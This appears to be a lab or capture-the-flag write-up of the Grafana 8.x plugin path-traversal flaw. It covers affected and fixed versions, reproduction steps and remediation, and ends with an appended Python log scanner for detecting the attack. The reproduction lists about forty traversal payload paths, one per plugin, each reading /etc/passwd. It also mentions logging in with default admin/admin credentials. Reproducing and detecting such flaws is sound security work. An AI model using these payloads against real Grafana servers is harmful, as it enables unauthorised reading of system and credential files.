Preface
For a detailed analysis of the vulnerability, see https://blog.csdn.net/weixin_45794666/article/details/123228409
Vulnerability description
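Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is /public/plugins/<plugin-id>/, where <plugin-id> is the plugin ID of any installed plugin. Grafana Cloud was never vulnerable. Users are advised to upgrade to the patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about the vulnerable URL paths, mitigation, and the disclosure timeline.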
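Reproduction
The port is 3000.
Opening it shows a login page.
I tried the default credentials admin/admin and, to my surprise, got in…
OK, enough playing around; the above is not part of reproducing this vulnerability.
First, capture a request.
Construct the payload path. Because the vulnerability is caused by plugins, the payload differs slightly from plugin to plugin; below are the payloads for almost all plugins.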
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd
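Taking the first one as an example, changing the request path to the payload path reads the passwd file.
Where is the flag?
In the command history.
Remediation
Upgrade to a fixed version or apply the patch.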
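As a detection aid alongside upgrading, the following added example (not part of the original post and not Grafana's code) scans access-log lines for requests under /public/plugins/<plugin-id>/ whose path resolves outside that plugin's directory. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

PLUGIN_PREFIX = "/public/plugins/"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def decode_path(raw_target, rounds=3):
    """Return the URL path with up to `rounds` layers of percent-encoding removed."""
    path = urlsplit(raw_target).path
    for _ in range(rounds):
        path = unquote(path)
    return path.replace("\\", "/")

def escapes_plugin_dir(raw_target):
    """True if the target is under /public/plugins/<plugin-id>/ but resolves outside it."""
    path = decode_path(raw_target)
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, sep, rest = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id or not sep:
        return False
    base = PLUGIN_PREFIX + plugin_id
    resolved = posixpath.normpath(base + "/" + rest)
    return resolved != base and not resolved.startswith(base + "/")

def scan(lines):
    """Return (line_number, decoded_path) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and escapes_plugin_dir(match.group(1)):
            hits.append((number, decode_path(match.group(1))))
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /public/plugins/alertlist/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1203',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /public/plugins/graph/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1203',
    '203.0.113.7 - - [01/Jan/2024:10:00:11 +0000] "GET /public/plugins/text/img/../module.js HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /login HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: request resolves outside plugin directory -> {path}")
```

A 200 response on a flagged line indicates the file was served, so those entries are the ones to review first on instances that ran an affected version.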